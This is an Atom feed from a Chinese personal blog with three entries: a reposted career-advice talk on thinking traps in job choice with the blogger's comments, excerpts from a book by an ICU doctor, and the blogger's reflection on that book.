<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>老叭美食家</title>
  
  <subtitle>永远热爱生活</subtitle>
  <link href="https://laobameishijia.github.io/atom.xml" rel="self"/>
  
  <link href="https://laobameishijia.github.io/"/>
  <updated>2025-04-30T08:50:54.045Z</updated>
  <id>https://laobameishijia.github.io/</id>
  
  <author>
    <name>老叭美食家</name>
    
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>职业选择中的思维陷阱</title>
    <link href="https://laobameishijia.github.io/2025/04/30/zhi-ye-xuan-ze-zhong-de-si-wei-xian-jing/"/>
    <id>https://laobameishijia.github.io/2025/04/30/zhi-ye-xuan-ze-zhong-de-si-wei-xian-jing/</id>
    <published>2025-04-30T15:02:00.000Z</published>
    <updated>2025-04-30T08:50:54.045Z</updated>
    
    <content type="html"><![CDATA[<p>关于兰小欢老师，我之前阅读过《置身事内》，讲述了中国政府与经济发展之间的关系。细节已大都忘记，但我了解了政府在房地产经济中的角色以及其相应的做法，既明白了政府的无所不入，又感慨其捉襟见肘。今天能接触到这篇演讲稿，纯属巧合了。无意间在刷小红书的时候看到的，发现作者的名字十分熟悉，仔细回想才明白原来是《置身事内》的作者，然后就详细地读了一下。文章的链接我放在这里了，同时为了防止以后找不到，我把原文放到下面。<a href="https://mp.weixin.qq.com/s/sFVDFM-gKhSAkKdht0bguA">https://mp.weixin.qq.com/s/sFVDFM-gKhSAkKdht0bguA</a></p><p>阅读这篇演讲稿的过程中，我不止一次地感慨，许多文字和我的见解不谋而合，果然，阅读使我没有停止过独立思考，结果或对或错，但都有益于我独立思考能力的养成。以下是原文：</p><p>首先感谢各位校友和朋友，大家周六下午从各地专程赶来，支持学院的学生工作。江源老师找我来讲讲“职业选择中的思维陷阱”，跟同学们聊聊工作、聊聊职业选择。今天我就结合自己在学界、政府、金融产业的经历，跟同学们分享一些成长中的观察，不敢说教，只谈个人体会，有用最好，没用大家就当听听故事。</p><h3 id="一、选择的幻觉"><a href="#一、选择的幻觉" class="headerlink" title="一、选择的幻觉"></a>一、选择的幻觉</h3><p>先亮明观点：“重大选择”其实是种幻觉。</p><p>为什么这么说？主要想帮大家缓解焦虑，不要在做选择的时候给自己太大压力，单个的决策可能没有你想的那么重要。主要有四个原因。</p><p>第一，选择”好坏”是事后决定的。事情做成了那就是“选对了”，做砸了就是“选错了”，但事情的本质在于“做”而非“选”。事前谁也看不清未来，比如大家都不会想到有疫情。如今世界变化飞快，哪有绝对正确的选择？<strong>其实无论选什么，你还是你。</strong>今天就算你拿到哈佛offer或者高盛offer，也不会突然改变你的本质—你做事的方式、与人相处的模式，最终会让你活成“你本来的样子”<strong>，不会因为某个选择而突变。</strong></p><blockquote><p>是的，不会突变，不代表不会慢慢变化，也就是说你真正要改变的，是你做事的方式和与人相处的模式。</p></blockquote><p>第二，站在你们的位置，面临的选项差距其实没有那么大。不会真有“年薪百万老总助理” vs “月薪三千基层岗位”这种极端选择，更多是同类选项的细微差别，比如金融行业里是选券商还是银行。刚毕业时做的事情都差不多。所以别太纠结，选项间的差别多是些微小的“边际差异”，不必过度内耗。</p><blockquote><p>这一点，要具体问题具体分析，在每个人的选择中，有时不同的选择的确差异非常大，工作的地点、压力等。</p></blockquote><p>第三，人对结果的感知会动态调整。即便选了所谓“好机会”，也可能觉得“还有更好的”，那样就不会开心；选了“坏结果”，也可能发现“本来可能更差”，可能感觉就还不错。行为经济学有个经典的研究：中彩票者和因事故残疾者，一段时间后前者的幸福感不见得高于后者。人有强大的适应机制，会主动调整对结果的认知。所以事前不必放大选择的重要性，“车道山前必有路”是有用的智慧。</p><blockquote><p>这段有点安慰的意思了，精神胜利法呗，这里主要是适用于相差不多的选择。</p></blockquote><p>第四，人“做选择”的能力其实很弱。大家学过行为经济学，知道人并非理性。但其实人的选择连非理性都谈不上，就是一种说不清道不明的生理过程。大脑中的神经反应，甚至和上一顿饭吃了什么都有很大关系。从行为学研究来看，如果极端一点，人甚至没有绝对的自由意志。当然我不想深入这个话题，只是想强调：你给自己列出的所谓做选择的“理由”，其实大都不过是种感觉，经不起推敲。所以不必神话自己的“精明算计”能力，把单次选择看得太重。所有人都会不断犯错，中年人也一样。如果觉得人生像做题一样只有对或错的重大选择，那就完了。所谓的重大选择大都集中在20多岁时，比如事业和择偶，而这个阶段的既没资源，也缺乏足够的信息和人生阅历，怎么可能做出那么多正确的重大选择？真实的情况是，那些选择可能没有你想象的那么重大，20多岁后还有很长的路要走，容错机制和调整空间都很大，路是靠自己一步步走出来的，没有那么多重大的分岔路口，每条路的风景不一样罢了，关键是要行动起来，在实践中积累，边做边调整。</p><blockquote><p>这话我不同意，我觉得人有做选择的能力，至少我做选择时列出的理由并不是感觉，很多是结合对自身认知和实际情况列出来的。如果你有资源或者能接触到资源，再加上自己的人生阅历和自我认知，大概率是可以做出适合自己的选择的。</p></blockquote><h3 id="二、陷阱三连：考试思维-学历思维-标准答案思维"><a href="#二、陷阱三连：考试思维-学历思维-标准答案思维" class="headerlink" title="二、陷阱三连：考试思维+学历思维+标准答案思维"></a>二、陷阱三连：考试思维+学历思维+标准答案思维</h3><p>第二个基本现实是，读书读久了会形成特定思维模式。习惯于考试跟做题的思维方式有几个陷阱。第一是零和思维，高考、考研都是有你没我的竞争。第二个就是认为只能靠自己，只会靠自己。第三个就是觉得凡事有答案，有问题就有答案，非要把答案找出来不可。其实这个世界不是考试，很多时候连问题都不明确，提出问题本身就是创造答案的过程，这是很重要的实践能力。不是每个问题都有标准答案，学习，主要是为了构建思维框架、吸收新信息、深化认知，而不是为了考试。</p><p>人生没有答案。有个概念叫”抵达谬误”（arrival fallacy）。人有时候会想，我达到一个什么目标，这辈子就开心了，比如有一个小目标，在上海有两套房、进某家知名公司。但现实是，这些目标达成后，新的欲望又会出现。所以王尔德讲人生有两大悲剧，一是梦想实现不了，二是梦想终于实现。如果总是用外在标准衡量自己，比如职级、收入，你永远都不会满足。</p><p>我放的这张照片，你看这些年轻人笑得多开心，多有生命力。这里很多年轻人都来名校…..他们常年在青海的野外做动物多样性保护，比如追踪雪豹，生活很简单，连个像样的厕所都没有，工资也不高，是个公益组织。那天晚上一起吃饭，我看着他们脸上的状态，那种开心和年轻的感觉，我很久没有在大城市的大学里看到了。当然，我并不是说大家都去做公益，即使他们，到了二十七八岁的时候，也会因为种种压力而重返主流生活。但我想说的是，这样的经历对他们很重要，不要总担心自己走了弯路，人生没有白走的路。我拿到博士学位的时候，已经32岁了，看上去走了很多弯路，但那些时光我并没有睡大觉，都是我的人生经历。为了今天的演讲，我特意打电话问了这家公益组织的负责人，问他觉得这些孩子在这里的经历收获了什么。他和我讲了三件事。第一，常年在野外大自然，觉得人生渺小，会豁达一些。第二，<strong>常年在基层工作，不停和人打交道，知道再高大上的目标，实现起来也是非常复杂的，保护环境、动物、物种多样性，核心都是和人打交道。你们将来的工作也是如此，都是和人打交道，比你想象的复杂的多。</strong>我从学术界到产业界，最大的感受就是：办件事怎么这么难？推进一件事情太不容易了！写论文反而相对可控。第三，公益组织办事，十件事可能八件办不成，常年如此，所以学会了没有失败的心态，都是过程。而且在这里学习失败，成本比较低。这三种心态，其实对参与任何工作，都很宝贵。</p><blockquote><p>老爸也跟我说过同样的话，一是让我不要凡事都只靠自己，学会利用资源；二是让我明白人情世故，跟人打交道，遵守礼仪和各种潜规则，实话永远要憋在肚子里。现在我还是体会不到老爸灌输给我这些所谓的道理，也许未来的某一天，我会变成老爸，向未来的年轻人或者后辈再次重申这些论调。可他们也会像我一样，不予认同或无法理解。</p><p>关于很多问题没有答案，我想起了我之前在饭桌上跟苗哥的谈话，我说我不要婚前同居过的，不要发生过性行为的。苗哥反问我，你怎么知道她有没有过呢？我愣了，是啊，我怎么会知道呢？就算我提出这个问题，它真的有答案吗？别人会说实话吗？说了实话，我就会信吗？所以，我又再一次对自己产生了怀疑，这个问题，我是问还是不问，没有答案的问题，我问了又有什么价值？我真正在意的，到底是女生是否有过性行为，还是觉得自己没有过性行为，如果女生有，那我亏了的这种心理。你到底在意的是什么，想必你自己心里已经有了答案，人是无法欺骗自己的，既然有了答案，以后就做出修正，抓住重要的东西。</p></blockquote><h3 id="三、精英陷阱"><a href="#三、精英陷阱" class="headerlink" title="三、精英陷阱"></a>三、精英陷阱</h3><p>985高校有39所，在校生160万，每年向社会输送约三四十万的毕业生，批量生产的情况下，学历贬值严重。其实精英是强加给他们的人设，走出校园之后，社会并不按考试成绩高低分配资源。</p><p>在精英主义（meritocarcy）这个话题上，我是同意哈佛桑德尔教授的很多说法的。这套东西和价值观负面影响很大。它让成功的人变得傲慢，让失败的人变得沮丧，觉得是自己不行，同时让失败的人嫉妒成功的人，也让成功的人瞧不起失败的人。</p><p>不要对自己要求太高，过度要求自己会带来高成本。维持精英人设或形象的成本很高。比如，你认为自己就该处于某个圈层，年薪20万以下的不行，这可能会妨碍一些选择。在我心里真正的精英是为他人着想、有公心的人，而不是赚多少钱有多高地位。不要给自己太多负担，我们基本都是普通人。<strong>如果你真是个聪明人，应该选一个你喜欢住的地方，干一件你喜欢的事情，过一种你不愿意和别人交换的生活。</strong>我见过很多有钱人，有时羡慕他们的财富，但我明白我只是单纯喜欢他们的钱罢了，如果让我拿我的人生去换他们的人生，我没兴趣。这种心理很重要，当你看到别人光鲜，你脑子里会不自觉把自己代入，其实你看到的不是那个人本身，而是想象自己处于聚光灯下的状态。但其实仔细一想，根本没有必要羡慕别人，因为你没见过他深夜睡不着觉的样子。</p><blockquote><p>看起来，我也算是半个聪明人吧。兰小欢老师说得这种心理我研二才养成，以前我特别喜欢在马路上认车，羡慕别人开得各种好车。但后来我接触和了解到的很多人，他们开着特别贵的车，生活状况却不尽人意，听着他们的吐槽和感慨，我才明白，原来真正的幸福真的就在我身边，我根本不可能会跟他们互换人生，我只是单纯地喜欢那些所谓的豪车，喜欢坐在上面意淫罢了。</p></blockquote><h3 id="四、大城市陷阱"><a href="#四、大城市陷阱" class="headerlink" title="四、大城市陷阱"></a>四、大城市陷阱</h3><p>大家学过区域经济学，这门学问复旦有很多老师讲，<strong>所以你们都知道大城市的优势，但仔细想想，落实到你个人的生活上，这些宏观的好处跟你有什么关系？</strong>大城市的演唱会、博物馆，你一年能去几次？真看重这些，你坐飞机和高铁来看看，住酒店，一年来几次，成本也比生活在这里低得多。客观说，大城市工作机会多，但生活在上海的难度也在增加。职业选择本质是生活方式的选择，你醒着的时间里，近一半的时间在工作，而另一半时间的质量也和工作质量息息相关。所以职业选择就是生活选择。在大城市作为外地人，生活原子化、缺乏情感联结，而回到家乡，如果常常见到父母和亲朋好友，内心感受就不一样。“背井离乡”的代价，随着年龄的增长，可能会不断变大。</p><p>如果为了留在大城市，选择一份自己不喜欢的工作，会有三个麻烦。第一，工作占一半多的时间，如果不喜欢，生活很痛苦。第二，不喜欢工作，可能会“恨屋及乌”，对同事有负面情绪，不利于发展社交，而孤独是非常致命的。第三，就算是喜欢的工作，也未必见得就能带来更好的机会。<strong>你永远不知道下一个机会从哪里来，你干什么事开心，才能准备好一下次机会。</strong></p><p>人天生不是天天加班的，天天上班反人性，人类大脑最习惯的是打猎和种地，时忙时闲这种节奏。现代生活的快节奏，大脑压力是很大的。如果你还给自己加压，那就很难过了。这种难过无法避免，但大家可以给自己建立一个缓冲区。这类型缓冲区里，最重要的可能就是社交关系。如果在大城市很难建立社交关系，那就回到家乡，回到父母身边，回到中小学好友身边。由于历史上的原因，中国有很多好大学都在大城市。但中国搞基建搞了这么些年，小地方生活也很便利，也有一些机会，做些小事，可能过得也不错。而且出行到哪里都很方便。</p><blockquote><p>这段话与我的认知太贴近了，我曾不止一次拿这些话劝服我的父母让我去北京的想法。最终他们还是没有扭过我。大城市虽好，可我生活在大城市，说白了和住在村里无异，只是因为工作在那罢了。那既然如此，我为什么不选一个离家近的呢？</p><p>虽然我不确定兰小欢老师说这段话是否有点政治正确的意味，但确实是说到我心里去了。包括做喜欢的工作，以前我总觉得人要抓潮流，现在我真得变了，包括以后给妹妹选择专业，我要先问问她，她有没有真正喜欢的东西？大家也可以问问自己，如果你不知道，那就说明没有。因为如果你有，你甚至都不会犹豫。</p></blockquote><h3 id="五、杠杆陷阱与长期主义"><a href="#五、杠杆陷阱与长期主义" class="headerlink" title="五、杠杆陷阱与长期主义"></a>五、杠杆陷阱与长期主义</h3><p>最后讲杠杆，<strong>所有快速成功的事情，本质都是加杠杆，而且都是加在负债端。而真正长期的杠杆是信任</strong>。什么叫长期杠杆，拿赚钱来说，如果你赚钱都是出卖自己的时间，哪怕薪水高，其实也不富有。赚钱要撬动资源或资本，让别人为你工作，而撬动资源靠的是别人对你的信任。无论是在公司做团队领导还是创业，别人把时间或者钱交给你，因为别人信任你。信任是唯一可靠的长期杠杆。如果别人信任你，即便你偶尔犯一次错误，也会有下一次机会。</p><p>现在我看到很多年轻人就是太着急了，这个可以理解，时代导致的。但是我还是觉得年轻人需要长期主义。<strong>信任固然是别人对你的，但你自己首先也要信任自己，或者说散发出一种值得被信任的状态，这里很重要的是自己的心态。</strong>如果你做自己喜欢的事情，相信的事情，就更容易笃定一些，跟别人的相处过程中态度和动作不会变形。</p><p>最终这张照片是鲍威尔，现任美联储主席，他其实并非经济学专业出身，而是律师。世界上最重要的两大央行首脑其实都不是学经济学的，欧洲央行行长拉加德也是律师出身。可见走出校园后，学习能力最重要，而不是大学里的所谓的“专业”。曾有MBA学生问起鲍威尔职业生涯的建议，他就说了这句，“<strong>保持低调，努力工作，你会非常惊讶那么多有能力的人因为行为不检而自毁。</strong>”<strong>人生是长跑，竞争中胜出往往不是因为自身有多强，而是对手因各种问题而倒下了。</strong>我曾在课上讲过，<strong>人生最大的风险永远来自自己</strong>。大家老讲外部环境，第一个想到中美关系，但仔细想想这种关系跟你关系有多大呢？时代是时代，变幻莫测，但“自毁”的微观风险往往比宏观风险更大。大事小事，都是事，时间久了，很多毁掉自己机会的事情，可能都是些不起眼的小事的积累。回到演讲开头，自己做事的方式、与人相处的模式，最终会让你活成“你本来的样子”。</p><p>我就讲这么多，谢谢。</p><blockquote><p>如果我做我喜欢的事情，那么过程中我就会笃定一些。不知道有多少人劝我不要再打球了，列举了各种理由。可我从来没有动摇过，从高中到现在，我一直在打，一直在练。我真得很喜欢，可惜， 我并不能把篮球作为工作，如果以后真得有机会，我想利用业余时间去当篮球教练。</p><p>还有竞争中胜出的，往往不是因为自身能力有多强，而是对手倒下了。我深感如此，如果说保送是一场竞争，那我从来就没想过获胜，我只是一直在坚持自己，我学习不是为了拿成绩，也不是为了报送，就是为了提升自己。可最终结果就是，我获胜了。直到知道这个信息的时候，我还是不敢相信。</p><p>还有很多人劝我要多搞几次对象，我知道他们是想让我在过程中体会自己想要什么样的伴侣。可对于我而言，我真得无法对一个无法长期相处的女生动心。而且我自己认为自己很清楚自己想要什么样的人，搞一次和搞几次结果都是一样的，白浪费时间和精力。<strong>还是那句话，我把你当人，你把自己当人，也把我当人</strong>。而且我根本无法和一个从心底认定没有未来的女生携手，也许是内心里固有的性格吧，可能未来我会因为这个认知吃一些苦头，但我还是相信，我一定会找到我想找的伴侣，我会活成我本来的样子。</p></blockquote><hr><p>李奕轩 2025.04.30 星期三 下午16：49 晴</p>]]></content>
    
    
      
      
    <summary type="html">&lt;p&gt;关于兰小欢老师，我之前阅读过《置身事内》，讲述了中国政府与经济发展之间的关系。细节已大都忘记，但我了解了政府在房地产经济中的角色以及其相应的做法，既明白了政府的无所不入，又感慨其捉襟见肘。今天能接触到这篇演讲稿，纯属巧合了。无意间在刷小红书的时候看到的，发现作者的名字十分熟</summary>
      
    
    
    
    <category term="书籍阅读" scheme="https://laobameishijia.github.io/category/%E4%B9%A6%E7%B1%8D%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="书摘" scheme="https://laobameishijia.github.io/tag/%E4%B9%A6%E6%91%98/"/>
    
  </entry>
  
  <entry>
    <title>只有ICU医生知道书摘</title>
    <link href="https://laobameishijia.github.io/2025/04/27/zhi-you-icu-yi-sheng-zhi-dao-shu-zhai/"/>
    <id>https://laobameishijia.github.io/2025/04/27/zhi-you-icu-yi-sheng-zhi-dao-shu-zhai/</id>
    <published>2025-04-27T16:06:00.000Z</published>
    <updated>2025-04-30T08:50:54.040Z</updated>
    
    <content type="html"><![CDATA[<h1 id="《只有ICU医生知道》"><a href="#《只有ICU医生知道》" class="headerlink" title="《只有ICU医生知道》"></a><strong>《只有ICU医生知道》</strong></h1><p>《只有ICU医生知道》</p><ol><li><p>于是我告诉她，想当小学老师，你可能得有本科，甚至硕士的文凭。这是你自己的人生，你得自己去争取。而我作为妈妈，也有自己的梦想要去实现。</p></li><li><p>做你想成为的大人吧，无论你是那个孩子，还是那个家长。</p></li><li><p>一朵“花”可以慢慢地开，甚至可以开得和其他花都不一样，这并不代表它会不美丽。</p></li><li><p>她清楚地记得父母对其他姐妹的爱，却唯独没有提到自己。</p></li><li><p>我不知道她是否清楚，自己将要面临怎样的人生。</p></li><li><p>“你不懂，那种孤独的感觉，一天都没个人说话。​”</p></li><li><p>每当我和他们聊起大梦的病时，他们从来不会像普通家属那样问我，这个病能不能根治，能活多久，预后怎么办？她的父母唯一的要求，是珍惜现在。</p></li><li><p>线粒体和细胞是共生的关系，它提供能量，细胞提供适应它生存的环境。但是，线粒体并不像人们普遍想象的那样，脱离细胞就会孤单地死去。</p></li><li><p>理论上来说，在一个很严苛的，和细胞相近的环境里，它也能够生存，继而独立完成自己的功能。</p></li><li><p>我甚至和晓兰的儿子一样去算过命，希望上天多给我一点时间和妈妈相处。</p></li><li><p>她每天躺在那张小小的病床上，说她想她的妈妈了。</p></li><li><p>因为直到今天，我也还在这样的痛苦里挣扎。工作了十几年，我还没有完全明白，对于注定会离开的人来说，如果来到ICU结局注定是死亡，我们科的意义到底是什么？</p></li><li><p>有时我值班，会碰到老太太一个人跪在角落里，双手合十，嘴里念念有词地祈祷。也许是来医院里的人，心里都装着更重要的事，来来往往的谁都没有注意到这个老太太。</p></li><li><p>那时我并不知道，到底是什么帮助晓东顺利戒掉药瘾，成功出院。直到一年后，我又遇到一个病人，给了我答案。</p></li><li><p>当我们的身体习惯于依赖什么，就会逐渐失去独立生存的能力。何娟习惯了呼吸机帮她喘气，而她自己用于呼吸的肌肉，就会慢慢失去力量，甚至萎缩，这叫作ICU获得性肌无力，在长期使用呼吸机的病人中很常见。</p></li><li><p>三个多月过去，每一封手写信都被戴阿姨仔细地整理起来，放在何娟的床头柜上，现在已经是厚厚一沓。</p></li><li><p>她脸色红润了很多，脖子上气管切开的疤痕几乎看不见了。我知道，她的生活终于要脱离ICU，大步向前迈了。</p></li><li><p>我是在工作很久以后，才意识到，这四个字（情暖人心）有多重要，它可能本身就是一服很好的“药”​。</p></li><li><p>但我想，无论是医生，还是病患都该有挣脱惯性的勇气。</p></li><li><p>作为一个ICU医生，很多人在遇到我以前，过的就是那种最普通的人生，上学、考试、上班、结婚，每天纠结下一顿吃啥，也每天思考人生是旷野还是轨道。但很难说，命运在哪一刻就把人推向了转折点，推到了ICU医生面前。</p></li><li><p>我曾经觉得把病人救活，就很了不起了。但一个又一个病人让我意识到，活下来之后的人生，也无比重要。</p></li><li><p>到时候她也要当经纪人，签10多个主播，但阿紫说：​“我当了经纪人，不会这么冷冰冰的。​”</p></li><li><p>我却默默记下了几个关键词：瘦小，被欺负，健身房。</p></li><li><p>我想起小孙醒来以后，姐姐来探视他。小孙管病房里的医生、护士都叫“姐姐”​，管自己的亲姐姐却直呼其名。姐弟俩隔了太久没说过话，一时间也不知道该说什么，有些尴尬。</p></li><li><p>那一刻，我有点读懂了这个少年的自尊。</p></li><li><p>我们都曾想成为另一个人，试图改变外表，觉得只要这样，人生就会好起来</p></li><li><p>我曾误以为，外貌会决定很多东西。比如爱情、事业、被多少人喜爱、是否拥有完美的人生。但现在我觉得，自己成为怎样的人，做怎样的事，比长成什么样，重要得多。</p></li><li><p>每次都要面对一个我回答不了的问题：为什么人会死？</p></li><li><p>我想投诉的是这个制度，为什么病人都是重症了，医院还是没有特效药物？​”​“为什么人都可以在火星生活了，一个红斑狼疮治愈不了呢？​”</p></li><li><p>我没有插话，心里默默感慨，生活已经如此苦了，宋小鱼想喝点甜的，说不定意味着，她可能也想好好生活了。</p></li><li><p>每一个人都尽力了，每一个人都好辛苦，好绝望。而我们做的，就是帮这一家人重新注入希望，哪怕只能撬动一个人，让她用新的视角看待这一切，这个家都有可能重新运转</p></li><li><p>也许终有一天，我们每个人都会面临生命巨大的失去，病痛和死亡。而宋小鱼一家，还有许许多多带病生活的家庭，都在不断地教我，如何去面对这一天？一个45岁得了红斑狼疮的女性告诉我，她现在把做透析，就当作做SPA。她刚生病的时候，很怕成为家里的拖累，但老公和孩子表达关心的同时，依然照常打工、上学，她的家人用实际行动告诉她，这没什么。后来我每次见她，她都捧着手机，一边笑呵呵地追剧，一边躺在床上做透析。</p></li><li><p>告别时，他说，​“问题总会慢慢解决的，解决不了的问题，急也没有用。​”</p></li><li><p>不知道是说给我们，还是说给他妈妈。我站在一旁，看到他妈妈搂着他的手，好像又紧了紧。</p></li><li><p>我唯一不能接受的，是病人自己放弃。作为医生，哪怕病人放弃，我也要全力以赴。我不是一个会轻易动感情的人，写下这段经历的时候，可能是我流露感性最多的一次。记录了那么多ICU的故事，我总会倾向于记录那种，奇迹中生还的病人。我觉得这样的故事能告诉想要放弃的人：​“人类，一定要记住，你的生命力超过你想象。​”这句话不只对在病人说，对在人生道路上行走的你我，也是一样的</p></li><li><p>当父母在子女身上寄托了太多期待，孩子的存在仿佛只是为了满足父母的期待，至于他们喜欢什么、讨厌什么，想做什么、不想做什么，似乎都成了无所谓的事情。</p></li><li><p>3岁的儿子总是问她：“妈妈，我可以哭吗？”她说你可以哭。儿子要出去玩，她说你要玩得开心哦，儿子问：“那我可以玩得不开心吗？”她想了想回答，当然可以，因为不开心是每个人都会有的状态，有不开心的时候，才能感受到真正的开心。这样的对话多了，当她问自己儿子，可以不可以的时候。她的儿子总是回答她：“可以。”是啊，有什么是不可以的呢？</p></li><li><p>而我想分享给大家的歌叫《大梦》。它唱了一个人平凡普通的一生。读书、离家、工作、结婚、生子、老去。故事里的女孩也叫大梦。但我想，这样平凡普通的一生，可能是对他们最美好的祝愿。</p></li><li><p>在此之前的学生时代，我很少思考过这个问题：人类攻克一种疾病到底需要多少年？我以为那堆在一起比我人还高的教科书，早已写好了所有答案。当我真正成为一名医生以后，我才发现原来医学给我们留了这么多未解的难题。</p></li><li><p>因为线粒体的问题，她的身体缺乏足够的能量，去分解过多的乳酸，那些年轻人喜欢的徒步、剧本杀对她来说都是可能危及生命的事情。同时，她必须保持情绪的平静，任何一点情绪波动，都会使耗氧量增加。而她的线粒体也无法提供这么多能量，于是无氧代谢增加，身体开始分泌乳酸。</p></li><li><p>画面里，楼梯间一如既往的昏暗，角落里还有偷偷抽烟的家属留下的烟头和垃圾。老太太穿着件过时的衬衫，一头白发在脑后盘了个极小的髻，她跪在楼梯拐弯处的最角落，低着头，闭着眼睛，双手合十，嘴里碎碎念着，然后慢慢弯下腰，许久没有起来。</p></li></ol>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;《只有ICU医生知道》&quot;&gt;&lt;a href=&quot;#《只有ICU医生知道》&quot; class=&quot;headerlink&quot; title=&quot;《只有ICU医生知道》&quot;&gt;&lt;/a&gt;&lt;strong&gt;《只有ICU医生知道》&lt;/strong&gt;&lt;/h1&gt;&lt;p&gt;《只有ICU医生知道》&lt;/p&gt;
&lt;</summary>
      
    
    
    
    <category term="书籍阅读" scheme="https://laobameishijia.github.io/category/%E4%B9%A6%E7%B1%8D%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="书摘" scheme="https://laobameishijia.github.io/tag/%E4%B9%A6%E6%91%98/"/>
    
  </entry>
  
  <entry>
    <title>只有ICU医生知道读后感</title>
    <link href="https://laobameishijia.github.io/2025/04/27/zhi-you-icu-yi-sheng-zhi-dao-du-hou-gan/"/>
    <id>https://laobameishijia.github.io/2025/04/27/zhi-you-icu-yi-sheng-zhi-dao-du-hou-gan/</id>
    <published>2025-04-27T16:06:00.000Z</published>
    <updated>2025-04-30T08:50:54.041Z</updated>
    
    <content type="html"><![CDATA[<h1 id="《只有ICU医生知道》读后感"><a href="#《只有ICU医生知道》读后感" class="headerlink" title="《只有ICU医生知道》读后感"></a><strong>《只有ICU医生知道》</strong>读后感</h1><p>这本书是我在微信读书总榜上发现的，起初我并没有想看完这本书，不经意间居然翻阅完了。这本书页数并不多，记录了ICU医生余一生在ICU工作时治疗或接触过的病患，以及医生、病患、家属共同为治疗病情开展的交流。书中记录了很多我听过或没听过的病情，蜱虫病、秋水仙碱中毒、夹竹桃中毒、线粒体脑肌病、肿瘤、Talaromyces amestolkiae真菌感染、毛霉菌感染、阿贝类药物成瘾、因为美容手术引发的血栓、红斑狼疮。这些疾病的名称后，是一个个鲜活的人。是的，鲜活意味着如果没有这些病，他们和正常人没有什么区别，经历考试、结婚、生子的过程。</p><p>以前在我的潜意识里，医生是一个冷漠且又权威的职业，他们的情感在过多的生离死别中渐渐消失了。可我阅读过这本书后，我才知道，哪怕再多的生死考验后，医生还是有感情的，哪怕是ICU医生。像余医生介绍的那样，ICU的医生更多的时候类似于探案，治疗是不断假设又不断推翻假设的过程，因为ICU的病人送来时往往已经陷入昏迷。蜱虫病的阿英经过多轮筛查才得以确诊，最终通过血浆置换治愈。因为网恋分手而服用秋水仙碱中毒的松松，再通过各种信息筛查后，才得知松松以爷爷的名义多次购买了秋水仙碱的药物。考试不理想受到母亲责备而服用夹竹桃的小雨，意识清醒告诉了医生一切，后利用活性炭吸附血液中的毒素治愈。线粒体脑肌病的大梦，排查了与乳酸值升高的疾病后，才确诊，她从此不能情绪激动，不能剧烈运动，和年轻人相关的一切几乎都与她无缘。王晓兰的儿子在生命最后时期的陪伴，虽然没能挽救母亲的生命，但也给了他们最后的一段相处时光。药物成瘾的晓东在观看了母亲在楼道里祈祷的视频后，居然不再成瘾，但同样药物成瘾的阿树没有这么幸运死于肺部感染。还有同样药物成瘾的何娟，在丈夫和女儿的书信和绘画鼓励下，最终出院。</p><p>除了被动的患病，还有一些人为的因素。阿朱因为做抽脂手术出现意外，右半边身体没有反应。她迫于直播业绩的压力做了抽脂手术，从下午直播到凌晨，收入还只有护士的一半。因怕粉丝量减少，提前出院。于他相比，小孙要幸运的多。虽然他是为了改变自己开始吃所谓的肌肉增大剂，导致肝功能衰竭。长期以来虽然在家庭中备受呵护，但在学校却经常受到欺负。最终通过换肝活了下来。</p><p>当然也并不是所有的病都只有治愈和死亡两种可能性，宋小鱼患有红斑狼疮，这种病攻击她的大脑，自此她远离了校园。父母带着她四处求医无果，她自己不愿再拖累家庭，一度拒绝治疗。后来她的妈妈在余医生的同学马医生的推荐下，加入了红斑狼疮的病友群。宋妈妈看到其他病友虽然艰难，但都在认真生活后受到了鼓舞。经常给丈夫和女儿转发群中的各种信息。最终，宋小鱼在一天天的康复里，也重新发现了生活的有趣，活着，就意味着可以继续喝奶茶，看小说，有很多很多可能性。</p><p>当我在写这段感悟的时候，论文盲审的意见回来了，没有什么悬念，两个同意。但是分数是两个80分，同时都没有选择推荐为学校优秀论文。相比较其他同学的分数，我是偏低的。我看着别人的分数和优秀推荐，陷入了沉思，即便我知道在毕业论文上，我没有花费太多时间和心思，可直面结果时，依旧让我产生了一种心里波动，哪怕我提前预料到这种结果。一方面我为书中的各种患者的经历而感伤，认为生活里没有意外已经是非常不易了。我脑海里再次回顾了我所有的幸运，我认为老天一直在眷顾我。可另一方面，我在已经对生活感到非常满足的情况下，依旧在面对和别人的差距时，产生了一丝丝自卑的念头。这让我更加清楚地了解了自己，是的，不甘心不如别人，同时又无法付出全部的努力，这就是我的特质。我可以做到中等或者中上，但始终无法做到最好，也许在以后的工作生涯里，这些困惑会一遍遍地再次出现在我的脑海里，我希望以后的自己能对自己宽容一些，承认自己的性格的局限性，尝试着做到最好，结果不如意也没有关系。</p><p>题外话又说多了，说回书籍。我去过大大小小的医院很多次，不管是看病、探视，亦或是住院。我能看到在医院中不同人群的情感，有的展露在交谈中，有的藏在眼神里。书中各种抗击病情的案例，让我不由得想起了自己的舅舅和妗妗。舅舅辗转多地，一直在陪着妗妗看病，我不知道他想没想过放弃，也不知道他有没有预料到自己可以坚持这么久，还不知道他有没有想过一切是不是值得。可我看得到他日渐疲惫的身躯和迷茫的眼神，相比较其他读者，我想我更能体会到患者本身以及家属的情绪。妗妗的主治大夫们一起商量手术过程的时候，繁杂的步骤和惊人的工作量让我愣在原地，听上去，这种手术像是在给发动机拆零件然后装一个新的上去，可这是人啊！当时妗妗依旧和往常一样乐观，她笑着问我吃不吃香蕉，说自己现在身体状态不错，能吃能喝，像极了书里面与疾病抗争的人们。她信主，会阅读圣经。年少时我不懂，现在我才明白，希望对于人来讲是多么重要，尤其是你看不到希望的时候。</p><p>写到这，我将目光瞥向窗外，阳光照射到图书馆前面的草坪上，白白的云彩萦绕在综合楼的上空，微风时不时吹过我的脸颊，楼下熙熙攘攘的本科生，我感到一切是如此虚幻又如此真实。我只能珍惜眼前的生活，珍惜和家人相处的每一天。是的，这种生活终将会结束，可就像与疾病抗争的病患和家属一样，你不会因为结局不遂人愿而放弃，相反你会更加珍惜每一天。特别感谢我的家人，从年少时就已经在给我重申健康的重要性，我也一直在把新了解到的健康知识分享给他们，即便我们无法考虑到生活中的全部因素，但只要我们的努力能延长相处的时间，这就够了。没有健康的身体，一切又有什么意义，死去元知万事空嘛，珍惜每一天吧！</p>]]></content>
    
    
      
      
